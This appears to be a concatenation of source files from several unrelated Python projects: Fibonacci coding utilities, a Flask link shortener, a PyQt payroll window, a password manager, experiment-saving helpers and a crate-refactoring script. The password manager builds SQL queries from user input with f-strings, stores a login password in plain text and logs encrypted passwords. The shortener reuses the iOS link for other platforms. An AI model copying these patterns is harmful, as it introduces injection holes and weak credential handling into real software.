smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the right
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the binary number.
:rtype: int
"""
if nega:
fibs = _negafibs()
next(fibs) # ignore 0 and start with 1, -1, 2, ...
else:
fibs = _fibs()
next(fibs), next(fibs) # ignore 0, 1 and start with 1, 2, ...
return fromiter(_ordered_in(fibs, reversed(tuple(zeck))))
def str_fromzeck(zeck, nega=False):
"""
Construct a string of bits from a finite stream of Fibonacci
numbers, where the ith bit from the right is 1 if and only if the
(i + 2)th Fibonacci number appears in the stream.
:param zeck: a stream of Fibonacci numbers ordered from largest to
smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the right
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the string of bits.
:rtype: str
"""
return f'{fromzeck(zeck, nega=nega):b}'
def fibcode_fromzeck(zeck, nega=False):
"""
Construct a Fibonacci code word for a particular Zeckendorf
representation.
A Fibonacci code word is the bitstring of a Zeckendorf
representation, but reversed and with an extra "1" on the end. The
Fibonacci code is a variable-length Huffman code where "11" appears
at the end of a word and nowhere else.
:param zeck: a stream of Fibonacci numbers ordered from largest to
smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the left
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the Fibonacci code word.
:rtype: str
"""
return f'{str_fromzeck(zeck, nega=nega)[::-1]}1'
def fromint(n, nega=False):
"""
Construct a binary number from the Zeckendorf representation of n.
:param n: an integer.
:param nega: whether to use the nega-Zeckendorf representation in
lieu of the regular one. Negative values of n are only allowed
in this case.
:type n: int
:type nega: bool
:return: the binary number.
:rtype: int
"""
return fromzeck((negazeck if nega else zeck)(n), nega=nega)
def str_fromint(n, nega=False):
"""
Construct a string of bits from the Zeckendorf representation of n.
:param n: an integer.
:param nega: whether to use the nega-Zeckendorf representation in
lieu of the regular one. Negative values of n are only allowed
in this case.
:type n: int
:type nega: bool
:return: the string of bits.
:rtype: str
"""
return str_fromzeck((negazeck if nega else zeck)(n), nega=nega)
def fibcode_fromint(n, nega=False):
"""
Return the Fibonacci code word corresponding to a certain positive
integer.
A Fibonacci code word is the bitstring of a Zeckendorf
representation, but reversed and with an extra "1" on the end. The
Fibonacci code is a variable-length Huffman code where "11" appears
at the end of a word and nowhere else.
:param n: an integer.
:param nega: whether to generate a nega-Fibonacci code word instead
of a regular one. Negative values of n are only allowed in this
case.
:type n: int
:type nega: bool
:return: the Fibonacci code word.
:rtype: str
"""
if n == 0:
raise ValueError("0 cannot be converted to a Fibonacci code word")
return fibcode_fromzeck((negazeck if nega else zeck)(n), nega=nega)
def toiter(binary):
"""
Iterate over the bits of a binary number from right to left.
:param binary: a binary number.
:type binary: int
:return: an iterator of True and False values.
:rtype: Iterator[bool]
"""
while binary > 0:
yield bool(binary % 2)
binary >>= 1
def tozeck(binary, nega=False):
"""
Iterate over the Fibonacci numbers F_(i+2) for which the ith bit
from the right of a binary number is 1.
:param binary: a binary number.
:param nega: whether to return a nega-Zeckendorf representation
instead of a regular one.
:type binary: int
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
if nega:
fibs = _negafibs()
next(fibs) # ignore 0 and start with 1, -1, 2, ...
else:
fibs = _fibs()
next(fibs), next(fibs) # ignore 0, 1 and start with 1, 2, ...
return reversed([fib for bit, fib in zip(toiter(binary), fibs) if bit])
def str_tozeck(bitstr, nega=False):
"""
Iterate over the Fibonacci numbers F_(i+2) for which the ith bit
from the right of the string of bits is 1.
:param bitstr: a string of bits.
:param nega: whether to return a nega-Zeckendorf representation
instead of a regular one.
:type bitstr: str
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
return tozeck(int(bitstr, base=2), nega=nega)
def fibcode_tozeck(codeword, nega=False):
"""
Iterate over the Zeckendorf representation corresponding to a
particular Fibonacci code word.
:param codeword: a Fibonacci code word.
:param nega: whether to take in a nega-Fibonacci code word instead
of a regular one.
:type codeword: str
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
return tozeck(int(codeword[-2::-1], base=2), nega=nega)
def toint(binary, nega=False):
"""
Interpret a binary number as a Zeckendorf representation of an
integer, and return that integer.
:param binary: a binary number.
:param nega: whether to interpret the binary number as a
nega-Zeckendorf representation instead of a regular one.
:type binary: int
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(tozeck(binary, nega=nega))
def str_toint(bitstr, nega=False):
"""
Interpret a string of bits as a Zeckendorf representation of an
integer, and return that integer.
:param bitstr: a string of bits.
:param nega: whether to interpret the string of bits as a
nega-Zeckendorf representation instead of a regular one.
:type bitstr: str
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(str_tozeck(bitstr, nega=nega))
def fibcode_toint(codeword, nega=False):
"""
Convert a Fibonacci code word to the integer it represents.
:param codeword: a Fibonacci code word.
:param nega: whether to take in a nega-Fibonacci code word instead
of a regular one.
:type codeword: str
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(fibcode_tozeck(codeword, nega=nega))
if __name__ == '__main__':
# example: print bitstrings for Zeckendorf representations from 0-99
[(print(n, '=>', str_fromint(n))) for n in range(100)]
``` |
{
"source": "0xfr0ntier/shortify-flask",
"score": 3
} |
#### File: shortner_api/common/shortener.py
```python
import requests
from shortner_api.common.utils import generate_slug
from shortner_api.common.db import collec
API_KEY = "TINYURL API KEY"
def get_links() -> list:
lst = []
for doc in collec.find():
doc.pop('_id')
lst.append(doc)
return lst
def shorten_link(link: str) -> str:
req_url = f'https://api.tinyurl.com/create?api_token={API_KEY}'
req_body = {
'url': link,
'domain': 'tiny.one'
}
req = requests.post(req_url, req_body)
res = req.json()
return res['data']['tiny_url']
def shorten_links(args: dict) -> dict:
shortened_links = {}
slug = ''
while collec.find_one({'slug': (slug := generate_slug())}):
pass
shortened_links['slug'] = slug
shortened_links['web'] = shorten_link(args['ios'])
shortened_links['ios'] = {
'primary': shorten_link(args['ios']),
'fallback': args['ios']
}
shortened_links['android'] = {
'primary': shorten_link(args['ios']),
'fallback': args['android']
}
return shortened_links
def update_links(args: dict) -> dict:
doc = collec.find_one({'slug': args.pop('slug')})
for key, value in args.items():
if value:
doc[key] = shorten_link(value) if key == 'web' else {
'primary': shorten_link(value),
'fallback': value
}
return doc
```
#### File: shortner_api/parsers/parsers.py
```python
from flask_restful import reqparse
def non_empty_string(s):
if not s:
raise ValueError("Must not be empty string")
return s
# POST parser
post_args_parser = reqparse.RequestParser()
post_args_parser.add_argument('ios', required=True, nullable=False,
type=non_empty_string)
post_args_parser.add_argument('android', required=True,
nullable=False, type=non_empty_string)
post_args_parser.add_argument('web', required=True, nullable=False,
type=non_empty_string)
# PUT parser
put_args_parser = reqparse.RequestParser()
put_args_parser.add_argument(
'slug', required=True, nullable=False, type=non_empty_string)
put_args_parser.add_argument('ios', type=non_empty_string)
put_args_parser.add_argument('android', type=non_empty_string)
put_args_parser.add_argument('web', type=non_empty_string)
``` |
{
"source": "0xGhazy/ElReda-Mall",
"score": 3
} |
#### File: 0xGhazy/ElReda-Mall/sallary_report.py
```python
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic
import os
os.chdir(os.path.dirname(__file__))
with open("data center\hours.txt", "r") as obj:
_HOURS_ = int(obj.read())
class SallaryReport(QtWidgets.QWidget):
"""a class that create a new window for reporting the net sallary for the employee """
def __init__(self: "SallaryReport",
name: str, sallary: float,
rewards: float = 0,
addational: float = 0,
regularity_value: float = 0,
movements_value: float = 0,
delay_hours: int = 0,
absence_days: int = 0,
borrow_value: float = 0,
deduction_value: float = 0,
other_ded: float = 0,
services_value: float = 0
) -> None:
super(QtWidgets.QWidget, self).__init__()
uic.loadUi(r"design\report_interface.ui", self)
self.show()
# handling empty records
if rewards == "":
rewards = 0
if addational == "":
addational = 0
if regularity_value == "":
regularity_value = 0
if delay_hours == "":
delay_hours = 0
if absence_days == "":
absence_days = 0
if borrow_value == "":
borrow_value = 0
if deduction_value == "":
deduction_value = 0
if services_value == "":
services_value = 0
# set values to the lbl in the window
self.employee_name_lbl.setText(name)
self.employee_sallary_lbl.setText(sallary)
self.employee_rewards_lbl.setText(str(rewards))
self.add_sallary_lbl.setText(str(addational))
self.employee_regularity_lbl.setText(str(regularity_value))
self.movements_lbl.setText(str(movements_value))
total_employee_rights = float(sallary) + float(rewards) + float(addational) + float(regularity_value) + float(movements_value)
self.total_eployee_rights.setText(str(total_employee_rights))
self.employee_delay_lbl.setText(str(delay_hours))
self.employee_absence_lbl.setText(str(absence_days))
self.employee_borrow_lbl.setText(str(borrow_value))
self.employee_deduction_lbl.setText(str(deduction_value))
self.other_de_lbl.setText(str(other_ded))
self.employee_services_lbl.setText(str(services_value))
# some of important calculations for report
global _Hours_
pay_per_day = (float(sallary) / 30)
pay_per_hour = pay_per_day / _HOURS_
get_delay = pay_per_hour * int(delay_hours)
get_absence = pay_per_day * int(absence_days)
get_borrow = float(borrow_value)
get_deduction = float(deduction_value)
get_service = float(services_value)
employee_loan = get_delay + get_absence + get_borrow + get_deduction + get_service + float(other_ded)
self.total_employee_loan_lbl.setText(str("{:.2f}".format(employee_loan)))
# formating the net sallary and display it :)
net_sallary = (float(total_employee_rights)) - float(employee_loan)
self.employee_net_sallary.setText(str("{:.2f}".format(net_sallary)))
``` |
{
"source": "0xGhazy/PyPass-Project",
"score": 3
} |
#### File: PyPass-Project/cores/css_parser.py
```python
def parssing_css(theme_name) -> dict:
# [+] Reading The CSS file
content = []
try:
with open(theme_name, "r") as css_file:
content = css_file.readlines()
except Exception as error:
print(f"[-] Error message: \n{error}")
# [+] Data cleaning
separator = "/*###################### I'm separator :) ######################*/"
css_data = [line.strip() for line in content]
temp = ""
final_css = []
for word in css_data:
if word != separator:
temp += word
else:
final_css.append(temp)
temp = ""
# [+] Final data
parsed_data = {
"self" : final_css[0],
"tabWidget" : final_css[1],
"listWidget" : final_css[2],
"display_qr_btn" : final_css[3],
"decrypt_and_copy_password" : final_css[4],
"getting_account_id" : final_css[5],
"select_by_id" : final_css[6],
"listWidget_edit_accounts" : final_css[7],
"edit_account_platform" : final_css[8],
"edit_account_email" : final_css[9],
"edit_account_password" : final_css[10],
"show_password" : final_css[11],
"insert_account_data" : final_css[12],
"update_account_data" : final_css[13],
"delete_account_data" : final_css[14]
}
return parsed_data
```
#### File: PyPass-Project/cores/password.py
```python
import random
import string
class Password:
"""
Password class takes care of:
- Checks for password strength.
- Generates strong random password that contains lower/upper/numbers,
random password length 16 bits.
"""
def __init__(self):
self._password_strength = 0
self._max_strength = 4 # Covers all cases/constraints
self._random_password = ""
def check_length(self: "Password", password: str) -> None:
if len(password) >= 8:
self._password_strength += 1
def check_lower(self: "Password", password: str) -> None:
for letter in password:
if letter in string.ascii_lowercase:
self._password_strength += 1
break
def check_upper(self: "Password", password: str) -> None:
for letter in password:
if letter in string.ascii_uppercase:
self._password_strength += 1
break
def check_symbols(self: "Password", password: str) -> None:
symbols = string.punctuation
for letter in password:
if letter in symbols:
self._password_strength += 1
break
def check_numbers(self: "Password", password: str) -> None:
for letter in password:
if letter.isdigit():
self._password_strength += 1
break
## Get password strength score (x of 5)
def check_strength(self: "Password", password: str) -> int:
self.check_length(password)
self.check_lower(password)
self.check_numbers(password)
self.check_symbols(password)
self.check_upper(password)
return self._password_strength
def generate_password(self: "Password") -> str:
self._random_password = ""
for _ in range(0, 16):
self._random_password += random.choice(
string.ascii_uppercase +
string.ascii_lowercase +
string.digits)
return self._random_password
if __name__ == '__main__':
x = Password()
print("[+] Generate random password")
x.generate_password()
print("Random password: ", x._random_password)
print("\n\n[+] Check password strength")
x.check_strength("Hello_World 2022")
print(x._password_strength)
```
#### File: 0xGhazy/PyPass-Project/PyPass.pyw
```python
import os
import sys
from pathlib import Path
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic, QtGui
from PyQt5.QtWidgets import QLineEdit, QMessageBox, QMenu, QAction, QFileDialog
from cores.logsystem import LogSystem
from cores.encryption import Security
from cores.database_api import Database
from cores.QR_handler import QRHandler
from cores.password import Password
from cores.login_screen_handler import LoginScreen
from cores.css_parser import parssing_css
import pyperclip
BASE_DIR = Path(__file__).resolve().parent
main_UI = BASE_DIR / "ui" / "mainUI.ui"
# change this when you wanna add new platform, append it in lower case :)
SUPPORTED_PLATFORMS = ["facebook", "codeforces", "github",
"gmail", "hackerranck", "medium",
"outlook", "quora", "twitter",
"udacity", "udemy", "university", "wordpress"]
class PyPass(QtWidgets.QMainWindow):
def __init__(self) -> None:
super(PyPass, self).__init__()
os.chdir(os.path.dirname(__file__))
# loading .ui design file.
uic.loadUi(main_UI, self)
# hide tabwidget
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.tabBar().setVisible(False)
self.app_path = Path(__file__).resolve().parent
# Application Data
self.database_obj = Database()
self.security_obj = Security()
self.log_obj = LogSystem()
self.signin_window = LoginScreen()
self.password_obj = Password()
self.is_clicked = True # if show password is clicked
## calling the sign in window/Dialog
if self.signin_window.exec_() == QtWidgets.QDialog.Accepted:
# Starter methods
self.display_accounts_list()
self.display_accounts_to_edit()
self.handleButtons()
self.display_menus()
# show our application
self.show()
def handleButtons(self) -> None:
""" Handling all buttons in the application """
self.home_nav.clicked.connect(self.home_page)
self.accounts_nav.clicked.connect(self.accounts_page)
self.edit_nav.clicked.connect(self.edit_accounts_page)
self.settings_nav.clicked.connect(self.setting_page)
self.decrypt_and_copy_password.clicked.connect(self.copy_plaintext_password)
self.select_by_id.clicked.connect(self.select_account_id)
self.insert_account_data.clicked.connect(self.add_new_account)
self.update_account_data.clicked.connect(self.edit_account)
self.delete_account_data.clicked.connect(self.delete_account)
self.show_password.clicked.connect(self.is_plain)
self.display_qr_btn.clicked.connect(self.show_qr_image)
self.import_key_btn.clicked.connect(self.import_key)
self.export_key_btn.clicked.connect(self.export_key)
def display_menus(self):
menubar = self.menuBar()
# [+] Creating Edit menu
edit_menu = menubar.addMenu('&Edit')
# [+] `Change theme` submenu
theme_menu = QMenu('Change Theme', self)
self.theme0 = QAction('0- Default Theme', self)
self.theme1 = QAction('1- GitHub Dark', self)
self.theme2 = QAction('2- GitHub Light', self)
self.theme3 = QAction('3- Black Gold', self)
theme_menu.addAction(self.theme0)
theme_menu.addAction(self.theme1)
theme_menu.addAction(self.theme2)
theme_menu.addAction(self.theme3)
edit_menu.addMenu(theme_menu)
# [+] Handling change theme actions/invocations
self.theme0.triggered.connect(lambda i = None : self.change_theme("default.css"))
self.theme1.triggered.connect(lambda i = None : self.change_theme("Github-dark.css"))
self.theme2.triggered.connect(lambda i = None : self.change_theme("Github-light.css"))
self.theme3.triggered.connect(lambda i = None : self.change_theme("Black-Gold.css"))
def change_theme(self, theme_name):
themes_path = self.app_path / "ui" / "themes" / theme_name
css_style = parssing_css(themes_path)
# Setting new theme data.
self.setStyleSheet(css_style["self"])
self.tabWidget.setStyleSheet(css_style["tabWidget"])
self.listWidget.setStyleSheet(css_style["listWidget"])
self.display_qr_btn.setStyleSheet(css_style["display_qr_btn"])
self.decrypt_and_copy_password.setStyleSheet(css_style["decrypt_and_copy_password"])
self.getting_account_id.setStyleSheet(css_style["getting_account_id"])
self.select_by_id.setStyleSheet(css_style["select_by_id"])
self.listWidget_edit_accounts.setStyleSheet(css_style["listWidget_edit_accounts"])
self.edit_account_platform.setStyleSheet(css_style["edit_account_platform"])
self.edit_account_email.setStyleSheet(css_style["edit_account_email"])
self.edit_account_password.setStyleSheet(css_style["edit_account_password"])
self.show_password.setStyleSheet(css_style["show_password"])
self.insert_account_data.setStyleSheet(css_style["insert_account_data"])
self.update_account_data.setStyleSheet(css_style["update_account_data"])
self.delete_account_data.setStyleSheet(css_style["delete_account_data"])
############################
## Handling right buttons ##
############################
def home_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(0)
def accounts_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(1)
# refresh the list in the next click
self.listWidget.clear()
self.listWidget.update()
self.display_accounts_list()
def edit_accounts_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(2)
# refresh the list in the next click
self.listWidget_edit_accounts.clear()
self.listWidget_edit_accounts.update()
self.display_accounts_to_edit()
def setting_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(3)
# Display the currant key path
key_path = self.app_path / "cores" / "security_key.key"
self.enc_key_edit.setText(f" {str(key_path)}")
#######################################
## Handling buttons in accounts page ##
#######################################
def copy_plaintext_password(self) -> None:
"""Copy plain text password to clipboard after decrypting it."""
selected_account = self.listWidget.currentItem().text().split(" :: ")
accound_id = int(selected_account[0])
db_data = list(self.database_obj.db_query(f"SELECT * FROM Accounts WHERE id = {accound_id};"))
plaintext_password = self.security_obj.decrypt(db_data[0][3].encode())
pyperclip.copy(plaintext_password)
# create log event in /cores/Logs.txt
self.log_obj.write_into_log("+", f"({selected_account}) has been moved to the clipboard")
self.statusBar().showMessage("[+] Copy the selected account.")
return plaintext_password
def show_qr_image(self):
# [+] Generate the photo for selected account
self.qr_handle = QRHandler()
self.plain_password = <PASSWORD>()
self.qr_handle.generate_qr(self.plain_password, "photo.png")
# [+] Display the image
# Reading qr photo in Pixmap
self.pixmap = QPixmap("photo.png")
# Append the pixmap to QLable
self.qr_image_obj.setPixmap(self.pixmap)
self.qr_image_obj.setScaledContents(True)
# [+] Remove the image from the path.
os.remove("photo.png")
###################################
## Handling buttons in edit page ##
###################################
def select_account_id(self) -> None: # 11
"""return the selected account data and put them into edit line"""
account_id = self.getting_account_id.text()
try:
response = list(self.database_obj.db_query(f"SELECT * FROM Accounts WHERE id={account_id}"))
# display result on line edit
self.edit_account_platform.setText(response[0][1])
self.edit_account_email.setText(response[0][2])
self.edit_account_password.setText(self.security_obj.decrypt(response[0][3].encode()))
# create log event with the selected account information with out password !!
self.log_obj.write_into_log("+", f"({response[0][0:-1]}) Was selected!")
except Exception as error_message:
print(error_message)
def add_new_account(self) -> None:
"""adding new account to database"""
plat_name = self.edit_account_platform.text()
account = self.edit_account_email.text()
plain_password = self.edit_account_password.text()
# Check for the password strength
if (self.password_obj.check_strength(plain_password) < 3):
generated_password = self.password_obj.generate_password()
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Information)
msgBox.setWindowTitle("Password Tip!")
msgBox.setText(f"""
Your password seems to be weak one :(
Let me help you with powerful random password\n\n
Your password will be: {<PASSWORD>}
""")
msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
user_response = msgBox.exec()
if user_response == QMessageBox.Ok:
plain_password = <PASSWORD>
# Encrypt password
encrypted_password = self.security_obj.encrypt(plain_password)
self.database_obj.db_query(
f"INSERT INTO Accounts (ApplicationName, Account, EncryptedPassword) VALUES ('{plat_name}', '{account}', '{encrypted_password}');")
self.statusBar().showMessage("[+] A new account has been added to database.")
self.log_obj.write_into_log("+", f"(('{plat_name}', '{account}', '{encrypted_password}')) account was added!")
self.edit_accounts_page()
def edit_account(self) -> None:
"""update selected account on database"""
plat_name = self.edit_account_platform.text()
account = self.edit_account_email.text()
plain_password = self.edit_account_password.text()
encrypted_password = self.security_obj.encrypt(plain_password)
id = int(self.getting_account_id.text())
self.database_obj.db_query(
f"UPDATE Accounts SET ApplicationName = '{plat_name}', Account = '{account}', EncryptedPassword = '{<PASSWORD>}' WHERE id = {id};")
self.log_obj.write_into_log("+", f"(('{plat_name}', '{account}', '{encrypted_password}')) account was updated!")
self.statusBar().showMessage("[+] The account has been updated successfully!")
self.edit_accounts_page()
def is_plain(self):
if self.is_clicked:
self.edit_account_password.setEchoMode(QLineEdit.EchoMode.Normal)
self.show_password.setText("Hide")
self.is_clicked = False
elif self.is_clicked == False:
self.edit_account_password.setEchoMode(QLineEdit.EchoMode.Password)
self.show_password.setText("Show")
self.is_clicked = True
def delete_account(self) -> None:
"""delete selected account from fatabase"""
id = int(self.getting_account_id.text())
self.database_obj.db_query(f"DELETE FROM Accounts WHERE id = {id};")
self.log_obj.write_into_log("+", f"({id}) account was deleted!")
self.statusBar().showMessage("[+] The account has been removed successfully!")
self.edit_accounts_page()
######################################
## Handling Methods in setting page ##
######################################
def import_key(self):
key_file, _ = QFileDialog.getOpenFileName(self, 'Open file', '', 'All Files (*.*)')
if len(key_file) < 1:
pass
else:
# Read the key.
with open(key_file, "rb") as k_file:
content = k_file.read()
# Write The new key.
key_path = self.app_path / "cores" / "security_key.key"
with open(key_path, "wb") as k_file:
k_file.write(content)
self.log_obj.write_into_log("+", f"A new key has been imported")
self.statusBar().showMessage("[+] Your new key is imported successfully!")
def export_key(self):
exported_key_path, _ = QFileDialog.getSaveFileName(self, "Save File", "security_key.key")
key_file = self.app_path / "cores" / "security_key.key"
# Read the key.
with open(key_file, "rb") as k_file:
content = k_file.read()
# Write The new key.
with open(exported_key_path, "wb") as k_file:
k_file.write(content)
self.log_obj.write_into_log("+", f"The key is exported at {exported_key_path}")
self.statusBar().showMessage(f"[+] Your key is Exported successfully! @ {exported_key_path}")
######################
## Separate Methods ##
######################
def reading_database_records(self) -> list:
"""retrieve all database accounts
Returns:
list: list of database accounts
"""
result = self.database_obj.db_query("SELECT * FROM Accounts")
return list(result)
def display_accounts_list(self) -> None:
"""append all database accounts to QListWidget on accounts page."""
icons_path = os.path.join(os.path.dirname(__file__), "ui", "icons", "socialIcons")
data = self.reading_database_records()
record_index = 0
for row in data:
icon = QtGui.QIcon(os.path.join(icons_path, f"{row[1].lower()}.png"))
if f"{row[1].lower()}" in SUPPORTED_PLATFORMS:
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[2]}")
self.listWidget.addItem(item)
else:
icon = QtGui.QIcon(os.path.join(icons_path, f"user.png"))
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[1]} :: {row[2]}")
self.listWidget.addItem(item)
record_index += 1
def display_accounts_to_edit(self) -> None:
"""append all database accounts to QListWidget on edit page."""
self.listWidget_edit_accounts.update()
icons_path = os.path.join(os.path.dirname(__file__), "ui", "icons", "socialIcons")
data = self.reading_database_records()
record_index = 0
for row in data:
icon = QtGui.QIcon(os.path.join(icons_path, f"{row[1].lower()}.png"))
if f"{row[1].lower()}" in SUPPORTED_PLATFORMS:
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[2]}")
self.listWidget_edit_accounts.addItem(item)
self.listWidget_edit_accounts.repaint()
else:
icon = QtGui.QIcon(os.path.join(icons_path, f"user.png"))
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} ::{row[1]} :: {row[2]}")
self.listWidget_edit_accounts.addItem(item)
self.listWidget_edit_accounts.update()
record_index += 1
if __name__ == "__main__":
# calling our application :)
app = QtWidgets.QApplication(sys.argv)
window = PyPass()
app.exec_()
```
#### File: 0xGhazy/PyPass-Project/setup.py
```python
import os
import sys
import getpass
from cores.database_api import Database
from platform import platform
def check_python_version():
# check if python 3 is installed
if sys.version_info[0] != 3:
print("[-] Python 3.x is required.")
return 0
else:
return 1
def install_reqs():
# install requirements from req.txt
if platform() == 'Windows':
os.system("pip install -r req.txt")
os.system("cls")
else:
os.system("pip3 install -r req.txt")
os.system("clear")
print("\n Requirements installed successfully \n")
def user_account_setup():
# create database object
db_obj = Database()
# use existing username from os as Account Username
user_name = os.getlogin()
print("Your user name is: " + user_name)
# allow user to create a unique Account Password
print("Your Account Password: ", end = "")
user_pass = <PASSWORD>()
db_obj.db_query(f"INSERT INTO Users (UserName, UserPass) VALUES ('{user_name}', '{user_pass}');")
print("User Account Created!")
if __name__ == '__main__':
# change cwd to the setup.py script directory
os.chdir(os.path.dirname(__file__))
if check_python_version():
try:
install_reqs()
user_account_setup()
except Exception as error_message:
print(f"[-] Error Massage:\n{error_message}\n")
else:
exit()
``` |
{
"source": "0xgpapad/Ax",
"score": 2
} |
#### File: storage/json_store/save.py
```python
import json
from typing import Any, Callable, Type, Dict
from ax.core.experiment import Experiment
from ax.storage.json_store.encoder import object_to_json
def save_experiment(
experiment: Experiment,
filepath: str,
encoder_registry: Dict[Type, Callable[[Any], Dict[str, Any]]],
class_encoder_registry: Dict[Type, Callable[[Any], Dict[str, Any]]],
) -> None:
"""Save experiment to file.
1) Convert Ax experiment to JSON-serializable dictionary.
2) Write to file.
"""
if not isinstance(experiment, Experiment):
raise ValueError("Can only save instances of Experiment")
if not filepath.endswith(".json"):
raise ValueError("Filepath must end in .json")
json_experiment = object_to_json(
experiment,
encoder_registry=encoder_registry,
class_encoder_registry=class_encoder_registry,
)
with open(filepath, "w+") as file:
file.write(json.dumps(json_experiment))
```
#### File: utils/testing/mock.py
```python
from contextlib import ExitStack, contextmanager
from functools import wraps
from typing import Callable, Generator
from unittest import mock
from scipy.optimize import minimize
@contextmanager
def fast_botorch_optimize_context_manager() -> Generator[None, None, None]:
"""A context manager to force botorch to speed up optimization. Currently, the
primary tactic is to force the underlying scipy methods to stop after just one
iteration.
"""
def one_iteration_minimize(*args, **kwargs):
if kwargs["options"] is None:
kwargs["options"] = {}
kwargs["options"]["maxiter"] = 1
return minimize(*args, **kwargs)
with ExitStack() as es:
mock_generation = es.enter_context(
mock.patch(
"botorch.generation.gen.minimize",
wraps=one_iteration_minimize,
)
)
mock_fit = es.enter_context(
mock.patch(
"botorch.optim.fit.minimize",
wraps=one_iteration_minimize,
)
)
yield
if mock_generation.call_count < 1 and mock_fit.call_count < 1:
raise AssertionError(
"No mocks were called in the context manager. Please remove unused "
"fast_botorch_optimize_context_manager()."
)
def fast_botorch_optimize(f: Callable) -> Callable:
"""Wraps f in the fast_botorch_optimize_context_manager for use as a decorator."""
@wraps(f)
def inner(*args, **kwargs):
with fast_botorch_optimize_context_manager():
return f(*args, **kwargs)
return inner
``` |
{
"source": "0xgpapad/crosvm",
"score": 3
} |
#### File: tools/contrib/cargo_refactor.py
```python
from contextlib import contextmanager
from pathlib import Path
import os
import re
import shutil
import subprocess
from typing import Callable, List, Tuple, Union
SearchPattern = Union[str, re.Pattern[str]]
Replacement = Union[str, Callable[[re.Match[str]], str]]
def append_to_file(file_path: Path, appendix: str):
contents = file_path.read_text()
file_path.write_text(contents.rstrip() + "\n" + appendix + "\n")
def replace_in_file(file_path: Path, search: SearchPattern, replace: Replacement):
if not file_path.exists():
print(f"WARNING: Does not exist {file_path}")
return
if isinstance(search, str):
search = re.escape(search)
contents = file_path.read_text()
(contents, count) = re.subn(search, replace, contents)
if count > 0:
print(f"replacing '{search}' with '{replace}' in {file_path}")
file_path.write_text(contents)
def replace_in_files(glob: str, replacements: List[Tuple[SearchPattern, Replacement]]):
for file in Path().glob(glob):
for (search, replace) in replacements:
replace_in_file(file, search, replace)
def replace_path_in_all_cargo_toml(old_path: Path, new_path: Path):
"Replace path in all cargo.toml files, accounting for relative paths."
for toml in Path().glob("**/Cargo.toml"):
crate_dir = toml.parent
old_rel = os.path.relpath(old_path, crate_dir)
new_rel = os.path.relpath(new_path, crate_dir)
replace_in_file(toml, re.escape(f'path = "{old_rel}"'), f'path = "{new_rel}"')
def update_path_deps(toml: Path, from_path: Path, to_path: Path):
"Update path deps in toml file after moving it"
contents = toml.read_text()
for old_dep in re.findall('{ path = "([^"]+)"', contents):
new_dep = os.path.relpath((from_path / old_dep).resolve(), to_path)
contents = contents.replace(f'path = "{old_dep}"', f'path = "{new_dep}"')
toml.write_text(contents)
def move_crate(from_path: Path, to_path: Path):
"Move crate and update dependencies"
print(f"{from_path} -> {to_path}")
if to_path.exists():
shutil.rmtree(to_path)
shutil.copytree(str(from_path), str(to_path))
update_path_deps(to_path / "Cargo.toml", from_path, to_path)
replace_in_files("**/*/Cargo.toml", [(str(from_path), str(to_path))])
replace_in_file(Path("Cargo.toml"), str(from_path), str(to_path))
def update_workspace_members():
members: list[str] = []
members.append("members = [")
for toml in sorted(Path().glob("*/Cargo.toml")):
members.append(f' "{toml.parent}",')
members.append(' "third_party/vmm_vhost",')
members.append("]")
replace_in_file(Path("Cargo.toml"), re.compile(r"members = \[[^\]]+\]"), "\n".join(members))
exclude: list[str] = []
exclude.append("exclude = [")
for toml in sorted(Path().glob("common/*/Cargo.toml")):
exclude.append(f' "{toml.parent}",')
exclude.append("]")
replace_in_file(Path("Cargo.toml"), re.compile(r"exclude = \[[^\]]+\]"), "\n".join(exclude))
@contextmanager
def chdir(path: Union[Path, str]):
origin = Path().absolute()
try:
os.chdir(path)
yield
finally:
os.chdir(origin)
def copy_crate_src_to_module(source: str, destination: str):
shutil.rmtree(destination, ignore_errors=True)
shutil.copytree(source, destination)
with chdir(destination):
Path("lib.rs").rename("mod.rs")
IMPORT = """pub mod unix;
#[cfg(windows)]
pub mod windows;
"""
BUILD_RS = """\
// Copyright 2022 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
fn main() {
